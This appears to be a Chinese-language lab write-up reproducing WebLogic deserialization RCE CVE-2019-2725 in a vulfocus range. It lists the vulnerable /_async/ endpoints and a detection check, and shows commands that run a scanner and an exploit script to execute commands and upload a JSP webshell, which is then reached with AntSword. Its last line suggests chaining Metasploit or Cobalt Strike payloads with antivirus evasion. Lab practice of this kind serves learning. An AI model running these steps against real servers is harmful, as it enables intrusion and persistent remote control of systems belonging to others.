文中主要讲解Weblogic漏洞,通过文中的漏洞步骤了解中间件漏洞原理;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。
WebLogic CVE-2019-2725
漏洞环境:使用vulfocus拉环境开启
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.45.135 vulfocus/vulfocus
漏洞描述:
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。
影响版本:
weblogic 10.x;
weblogic 12.1.3
漏洞存在:
/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceSoap12
/_async/AsyncResponseServiceSoap12Jms
/_async/AsyncResponseServiceSoap12Https
通过使用/_async/来进行漏洞判断 返回403漏洞存在,404则不存在。
漏洞复现一:
访问控制台 http://192.168.45.135:16745/console/login/LoginForm.jsp 版本为:10.3.6(版本号便于后续用exp利用)
使用poc脚本进行漏洞检测:
python3 weblogicScan.py -u 192.168.45.135 -p 16745
可以看出漏洞存在:
使用exp脚本执行命令:返回结果:
pip3 install logzero
python3 weblogic-2019-2725.py 10.3.6 http://192.168.45.135:16745 whoami
上传webshell:
python3 weblogic-2019-2725.py 10.3.6 http://192.168.45.135:16745/
由于中途靶机卡顿,关闭后重启,端口变化
python3 weblogic-2019-2725.py 10.3.6 http://192.168.45.135:26776/
靶机环境使用kali docker启动,故ipconfig 改成ifconfig
漏洞复现二:
使用工具进行检测:
上传JSP木马
连接地址:http://192.168.45.135:23269//wls-wsat/test.jsp
傻逼环境 老是卡。。。换端口23269。。。。。
使用蚁剑连接成功:
同样可以通过上传msf或者CS生成的exe,进行联动。(PS:注意免杀)